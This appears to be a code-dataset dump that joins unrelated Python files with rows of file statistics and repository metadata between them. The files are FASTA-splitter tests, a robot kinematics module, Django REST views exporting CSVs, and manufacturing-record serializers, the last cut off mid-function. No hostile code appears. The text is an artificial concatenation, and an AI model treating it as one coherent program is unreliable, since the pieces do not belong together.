sequences_file.write(">ValidDescription2 |text2\nCCC\n")
sequences_file.write(">ValidDescription3\nGGG\n")
assert fastasplitter.split_fasta_sequences_file \
.check_if_is_valid_fasta_sequences_file(temporary_sequences_file) is None
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_path_parents_then_return_empty_path_parents_underscored_string():
sequences_file_path_parents_underscored_expected = ""
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
assert sequences_file_path_parents_underscored_returned == sequences_file_path_parents_underscored_expected
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_path_parents_then_return_path_parents_underscored_string():
sequences_file_path_parents_underscored_expected = "sequences_directory"
temporary_sequences_directory = Path("sequences_directory")
temporary_sequences_directory.mkdir()
temporary_sequences_file = temporary_sequences_directory.joinpath("sequences.fasta")
with open(temporary_sequences_file, mode="w"):
pass
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
assert sequences_file_path_parents_underscored_returned == sequences_file_path_parents_underscored_expected
temporary_sequences_file.unlink()
temporary_sequences_directory.rmdir()
def test_when_fasta_sequences_file_valid_then_return_sequences_name_list():
sequences_name_list_expected = ["Sequence1", "Sequence2", "Sequence3"]
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
for index in range(len(sequences_name_list_returned)):
assert sequences_name_list_returned[index] == sequences_name_list_expected[index]
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_valid_then_return_sequences_data_list():
sequences_data_list_expected = ["AAA", "CCC", "GGG"]
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_data_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_data_list(temporary_sequences_file)
for index in range(len(sequences_data_list_returned)):
assert sequences_data_list_returned[index][1] == sequences_data_list_expected[index]
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_valid_then_split_sequences_and_write_to_disk():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
sequences_data_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_data_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_from_sequences_lists(sequences_file_path_parents_returned,
sequences_file_extension_returned,
sequences_name_list_returned,
sequences_data_list_returned)
assert sequence1_file_expected.exists()
assert sequence2_file_expected.exists()
assert sequence3_file_expected.exists()
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_no_path_parents_then_write_sequences_list_file_to_disk():
sequences_list_file_expected = Path("Sequences_List.txt")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_index_list_text_file(sequences_file_path_parents_underscored_returned,
sequences_file_extension_returned,
sequences_name_list_returned)
assert sequences_list_file_expected.exists()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
def test_when_fasta_sequences_file_has_path_parents_then_write_sequences_list_file_to_disk():
sequences_list_file_expected = Path("sequences_directory_Sequences_List.txt")
temporary_sequences_directory = Path("sequences_directory")
temporary_sequences_directory.mkdir()
temporary_sequences_file = temporary_sequences_directory.joinpath("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sequences_file_path_parents_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents(temporary_sequences_file)
sequences_file_path_parents_underscored_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_path_parents_underscored(sequences_file_path_parents_returned)
sequences_file_extension_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_file_extension(temporary_sequences_file)
sequences_name_list_returned = fastasplitter.split_fasta_sequences_file \
.get_sequences_name_list(temporary_sequences_file)
fastasplitter.split_fasta_sequences_file \
.write_sequences_fasta_files_index_list_text_file(sequences_file_path_parents_underscored_returned,
sequences_file_extension_returned,
sequences_name_list_returned)
assert sequences_list_file_expected.is_file()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
temporary_sequences_directory.rmdir()
def test_when_execute_main_function_with_valid_fasta_sequences_file_then_return_successful_termination_code():
sequence1_file_expected = Path("Sequence1.fasta")
sequence2_file_expected = Path("Sequence2.fasta")
sequence3_file_expected = Path("Sequence3.fasta")
sequences_list_file_expected = Path("Sequences_List.txt")
temporary_sequences_file = Path("sequences.fasta")
with open(temporary_sequences_file, mode="w") as sequences_file:
sequences_file.write(">Sequence1|text1\nAAA\n")
sequences_file.write(">Sequence2 |text2\nCCC\n")
sequences_file.write(">Sequence3\nGGG\n")
sys.argv = ["", temporary_sequences_file]
with pytest.raises(SystemExit) as pytest_wrapped_e:
runpy.run_path("fastasplitter/split_fasta_sequences_file.py", run_name="__main__")
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 0
sequence1_file_expected.unlink()
sequence2_file_expected.unlink()
sequence3_file_expected.unlink()
sequences_list_file_expected.unlink()
temporary_sequences_file.unlink()
| 59.11041 | 118 | 0.787757 | 2,196 | 18,738 | 6.175319 | 0.067395 | 0.220485 | 0.118428 | 0.089669 | 0.852666 | 0.804439 | 0.759826 | 0.737114 | 0.722661 | 0.701202 | 0 | 0.005755 | 0.146921 | 18,738 | 316 | 119 | 59.297468 | 0.842602 | 0 | 0 | 0.615942 | 0 | 0.003623 | 0.089124 | 0.023322 | 0 | 0 | 0 | 0 | 0.112319 | 1 | 0.072464 | false | 0.014493 | 0.021739 | 0 | 0.094203 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4eb3c253be4df6f8de155971e77558cc88966cce | 134 | py | Python | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | 5 | 2019-01-31T19:47:52.000Z | 2019-03-06T09:44:47.000Z | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | kirby/builtins/users/__init__.py | kirby6/kirby | d58086c53b0b1957a701328c4539712512a68464 | [
"MIT"
] | null | null | null | from .routes import create_user_route, get_user_by_id_route, get_users_route
from .controller import get_user_by_id, get_user_by_name
| 44.666667 | 76 | 0.880597 | 25 | 134 | 4.16 | 0.48 | 0.201923 | 0.259615 | 0.211538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08209 | 134 | 2 | 77 | 67 | 0.845528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
14fd18c6880be27a7abc0c8e387b52b3616fd249 | 3,880 | py | Python | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | robot_sim/robots/xybot/xybot.py | wangyan-hlab/wrs | 8f81cdd33a419d5b4ffe18d13cd4cbf9f258bc7c | [
"MIT"
] | null | null | null | import math
import numpy as np
import robot_sim._kinematics.jlchain as jl
import robot_sim.robots.robot_interface as ri
class XYBot(ri.RobotInterface):
def __init__(self, pos=np.zeros(3), rotmat=np.eye(3), name='XYBot'):
super().__init__(pos=pos, rotmat=rotmat, name=name)
self.jlc = jl.JLChain(homeconf=np.zeros(2), name='XYBot')
self.jlc.jnts[1]['type'] = 'prismatic'
self.jlc.jnts[1]['loc_motionax'] = np.array([1, 0, 0])
self.jlc.jnts[1]['loc_pos'] = np.zeros(3)
self.jlc.jnts[1]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[2]['type'] = 'prismatic'
self.jlc.jnts[2]['loc_motionax'] = np.array([0, 1, 0])
self.jlc.jnts[2]['loc_pos'] = np.zeros(3)
self.jlc.jnts[2]['motion_rng'] = [-2.0, 15.0]
self.jlc.reinitialize()
def fk(self, component_name='all', jnt_values=np.zeros(2)):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
self.jlc.fk(jnt_values)
def rand_conf(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.rand_conf()
def get_jntvalues(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.get_jnt_values()
def is_jnt_values_in_ranges(self, component_name, jnt_values):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.is_jnt_values_in_ranges(jnt_values)
def is_collided(self, obstacle_list=[], otherrobot_list=[]):
for (obpos, size) in obstacle_list:
dist = np.linalg.norm(np.asarray(obpos) - self.get_jntvalues())
if dist <= size / 2.0:
return True # collision
return False # safe
class XYTBot(ri.RobotInterface):
def __init__(self, pos=np.zeros(3), rotmat=np.eye(3), name='TwoWheelCarBot'):
super().__init__(pos=pos, rotmat=rotmat, name=name)
self.jlc = jl.JLChain(homeconf=np.zeros(3), name='XYBot')
self.jlc.jnts[1]['type'] = 'prismatic'
self.jlc.jnts[1]['loc_motionax'] = np.array([1, 0, 0])
self.jlc.jnts[1]['loc_pos'] = np.zeros(3)
self.jlc.jnts[1]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[2]['type'] = 'prismatic'
self.jlc.jnts[2]['loc_motionax'] = np.array([0, 1, 0])
self.jlc.jnts[2]['loc_pos'] = np.zeros(3)
self.jlc.jnts[2]['motion_rng'] = [-2.0, 15.0]
self.jlc.jnts[3]['loc_motionax'] = np.array([0, 0, 1])
self.jlc.jnts[3]['loc_pos'] = np.zeros(3)
self.jlc.jnts[3]['motion_rng'] = [-math.pi, math.pi]
self.jlc.reinitialize()
def fk(self, component_name='all', jnt_values=np.zeros(3)):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
self.jlc.fk(jnt_values)
def rand_conf(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.rand_conf()
def get_jntvalues(self, component_name='all'):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.get_jnt_values()
def is_jnt_values_in_ranges(self, component_name, jnt_values):
if component_name != 'all':
raise ValueError("Only support hnd_name == 'all'!")
return self.jlc.is_jnt_values_in_ranges(jnt_values)
def is_collided(self, obstacle_list=[], otherrobot_list=[]):
for (obpos, size) in obstacle_list:
dist = np.linalg.norm(np.asarray(obpos) - self.get_jntvalues()[:2])
if dist <= size / 2.0:
return True # collision
return False # safe | 42.173913 | 81 | 0.605155 | 554 | 3,880 | 4.052347 | 0.140794 | 0.096659 | 0.093096 | 0.042762 | 0.925612 | 0.911359 | 0.911359 | 0.911359 | 0.900223 | 0.898441 | 0 | 0.024129 | 0.230928 | 3,880 | 92 | 82 | 42.173913 | 0.728217 | 0.007474 | 0 | 0.779221 | 0 | 0 | 0.13413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155844 | false | 0 | 0.051948 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1178ec698be1b28e4dd0ef7cd9420ea7110b20fa | 10,934 | py | Python | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | content/views.py | AbdullahJaswal/Examination | 27f65a2e9630567ec213a13951965bb5b8db375d | [
"MIT"
] | null | null | null | from .serializers import *
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework.throttling import UserRateThrottle
from rest_framework.permissions import AllowAny, IsAuthenticated, IsAdminUser
from django.utils.decorators import method_decorator
from django.views.decorators.cache import cache_page
from django.conf import settings
import os
import pandas as pd
permissions = [AllowAny]
permissions_func = [AllowAny()]
# caching = [cache_page(60 * 5)]
caching = [cache_page(1)]
# Create your views here.
# Topic
class TopicList(generics.ListCreateAPIView):
model = Topic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = TopicSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class TopicDetail(generics.RetrieveUpdateDestroyAPIView):
model = Topic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = TopicSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Sub Topic
class SubTopicList(generics.ListCreateAPIView):
model = SubTopic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = SubTopicSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class SubTopicDetail(generics.RetrieveUpdateDestroyAPIView):
model = SubTopic
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = SubTopicSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Question
class QuestionList(generics.ListCreateAPIView):
model = Question
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = QuestionSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class QuestionDetail(generics.RetrieveUpdateDestroyAPIView):
model = Question
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = QuestionSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# Answer
class AnswerList(generics.ListCreateAPIView):
model = Answer
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = AnswerSerializer
def get_queryset(self):
return self.queryset.filter(is_active=True)
def get_permissions(self):
if self.request.method == 'POST':
return [IsAdminUser()]
return permissions_func
@method_decorator(caching)
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
# Create CSV in <PROJECT_ROOT>/data for development
if settings.DEBUG:
data = self.queryset
df = pd.DataFrame(data.values())
project_path = settings.BASE_DIR
folder_name = '/data/'
app_name = '{}'.format(self.model._meta.app_label)
file_name = '/{}.csv'.format(self.model.__name__.lower())
folder_path = '{}{}{}'.format(project_path, folder_name, app_name)
file_path = '{}{}'.format(folder_path, file_name)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
if os.path.exists(file_path):
os.remove(file_path)
df = df.sort_values(by=['id'])
df.to_csv(file_path, index=False)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
class AnswerDetail(generics.RetrieveUpdateDestroyAPIView):
model = Answer
permission_classes = permissions
throttle_classes = [UserRateThrottle]
queryset = model.objects.all()
serializer_class = AnswerSerializer
def get_permissions(self):
if self.request.method in ['PUT', 'PATCH', 'DELETE']:
return [IsAdminUser()]
return permissions_func
# # Nested (Category)
# class CategoryProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'cat'
# def get_queryset(self):
# return self.queryset.filter(
# category_id=self.kwargs.get('cat'),
# category__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
# # Nested (Subject)
# class SubjectProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'sub'
# def get_queryset(self):
# return self.queryset.filter(
# subject_id=self.kwargs.get('sub'),
# subject__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
# # Nested (Category Subject)
# class CategorySubjectProductList(generics.ListAPIView):
# permission_classes = permissions
# throttle_classes = [UserRateThrottle]
# queryset = Product.objects.all()
# serializer_class = ProductSerializer
# lookup_url_kwarg = 'cat'
# def get_queryset(self):
# return self.queryset.filter(
# category_id=self.kwargs.get('cat'),
# category__is_active=True,
# subject_id=self.kwargs.get('sub'),
# subject__is_active=True,
# is_active=True
# )
# @method_decorator(caching)
# def get(self, request, *args, **kwargs):
# return self.list(request, *args, **kwargs)
| 30.713483 | 89 | 0.648253 | 1,182 | 10,934 | 5.796108 | 0.114213 | 0.019267 | 0.044665 | 0.057802 | 0.860458 | 0.860458 | 0.860458 | 0.860458 | 0.854328 | 0.854328 | 0 | 0.001932 | 0.242546 | 10,934 | 355 | 90 | 30.8 | 0.825284 | 0.190964 | 0 | 0.893401 | 0 | 0 | 0.020496 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101523 | false | 0 | 0.050761 | 0.040609 | 0.538071 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
11d9d8acbea685509f80c0aea42bbad5e2532ab7 | 44,896 | py | Python | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/production/serializes/recording_serialize.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | from rest_framework import serializers
from apps.production.serializes.basicinfor_serialize import *
from apps.production.models.recording_model import *
from apps.process.models.basicinfor_model import *
from apps.plan.models.basicinfor_model import *
from commonFunction import *
from django.contrib.auth import get_user_model
from Mes import settings
User= get_user_model()
# region 考核信息定义 序列化器
class AssessmentRecordSerialize_Create(serializers.ModelSerializer):
"""
考核信息定义--create
"""
state = serializers.HiddenField(default="新建")
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "state","type","personnel","level","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5",
"image", "file","desc", "auditor", "create_user"
)
# 所有字段验证
def validate(self, attrs):
if not attrs["create_user"].has_perm('production.add_assessmentrecordmodel'): # 如果当前用户没有创建权限
raise serializers.ValidationError("当前用户不具备创建权限'")
if settings.SAME_USER!=True:
if attrs["create_user"].username == attrs["auditor"]: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
return attrs
# 审核者字段验证
def validate_auditor(self, value):
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_assessmentrecordmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 类型字段验证
def validate_type(self, value):
list = AssessmentTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
# 等级字段验证
def validate_level(self, value):
list = AssessmentLevelDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的等级不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的等级不在--'使用状态'")
return value
class AssessmentRecordSerialize_List(serializers.ModelSerializer):
"""
考核信息定义--list
"""
type = AssessmentTypeDefinitionSerialize_List(required=False)
personnel=PersonnelInforDefinitionSerialize_List()
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "state","type","personnel","dataTime", "auditor", "create_user","create_time","update_time"
)
class AssessmentRecordSerialize_Retrieve(serializers.ModelSerializer):
"""
考核信息定义--retrieve
"""
image =ProductionImageSerialize_List(many=True)
file =ProductionFileSerialize_List(many=True)
alter =ProductionAlterRecordSerialize_List(many=True)
type = AssessmentTypeDefinitionSerialize_List(required=False)
personnel=PersonnelInforDefinitionSerialize_List()
level = AssessmentLevelDefinitionSerialize_List()
class Meta:
model = AssessmentRecordModel
fields = "__all__"
class AssessmentRecordSerialize_Update(serializers.ModelSerializer):
"""
考核信息定义--update
"""
class Meta:
model = AssessmentRecordModel
fields = ("id", "name", "code", "type","personnel","level","dataTime",
"attribute1", "attribute2", "attribute3", "attribute4","attribute5",
"image", "file","desc", "auditor"
)
# 所有字段验证
def validate(self, attrs):
if self.instance.state != '新建': # 如果不是新建状态 不能更改信息
raise serializers.ValidationError("当前信息已提交,禁止更改")
return attrs
# 审核者字段验证
def validate_auditor(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
if settings.SAME_USER != True:
if self.instance.create_user == value: # 审核帐号不能与创建帐号相同
raise serializers.ValidationError("审核帐号不能与创建帐号相同'")
try:
auditor = User.objects.get(username=value)
except Exception as e:
raise serializers.ValidationError("指定的审核账号不存在")
if not auditor.has_perm('production.admin_AssessmentRecordmodel'):
raise serializers.ValidationError("指定的审核账号不具备审核权限")
return value
# 类型字段验证
def validate_type(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
list = AssessmentTypeDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的类型不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的类型不在--'使用状态'")
return value
# 等级字段验证
def validate_level(self, value):
if self.instance.state != '新建': # 如果不是新建状态 该字段不能更改
raise serializers.ValidationError("当前信息已提交,禁止更改")
list = AssessmentLevelDefinitionModel.objects.get(id=value.id)
if list is None: # 判断 父类别是否存在
raise serializers.ValidationError("指定的等级不存在")
elif (list.state != "使用中"): # 判断 父类别状态是否合适
raise serializers.ValidationError("指定的等级不在--'使用状态'")
return value
class AssessmentRecordSerialize_Partial(serializers.ModelSerializer):
"""
考核信息定义--partial
"""
class Meta:
model = AssessmentRecordModel
fields = ("id", "state", "alter")
# 所有字段验证
def validate(self, attrs):
try:
del attrs['alter'] # 删除alter字段
except Exception:
pass
return attrs
# 状态字段验证
def validate_state(self, value):
validate_states1(self.instance.state, value)
if ((self.instance.create_user == self.context['request'].user.username) and\
(self.instance.auditor != self.context['request'].user.username)): # 如果当前用户为创建账号但不是审核账号
if not (self.instance.state == "新建" and (value == "审核中" or value == "作废")):
raise serializers.ValidationError("创建者只能将[新建]信息更改成[审核中]或[作废]")
return value
# 审核记录字段验证
def validate_alter(self, value):
obj = AssessmentRecordModel.objects.get(id=self.instance.id).alter
for data in value:
obj.add(data.id)
return value
# endregion
# region 产品生产日报子项定义 序列化器
class ProductDailyReportItemSerialize_Create(serializers.ModelSerializer):
"""
产品生产日报子项定义--create
"""
create_user = serializers.HiddenField(default=serializers.CurrentUserDefault())
class Meta:
model = ProductDailyReportItemModel
fields = ("id", "handler","producttask_code","product_id", "all_sum", "ok_sum", "ng_sum",
"attribute1","attribute2","attribute3","attribute4","attribute5","image","file","desc","create_user")
# 所有字段验证
def validate(self, attrs):
try:
product = ProductInforDefinitionModel.objects.get(id=attrs["product_id"]) # 判断指定的产品是否存在
except Exception as e:
raise serializers.ValidationError("指定的产品不存在")
if product.state != "使用中":
raise serializers.ValidationError("指定的产品不在'使用中'状态")
if 'producttask_code' in attrs.keys():
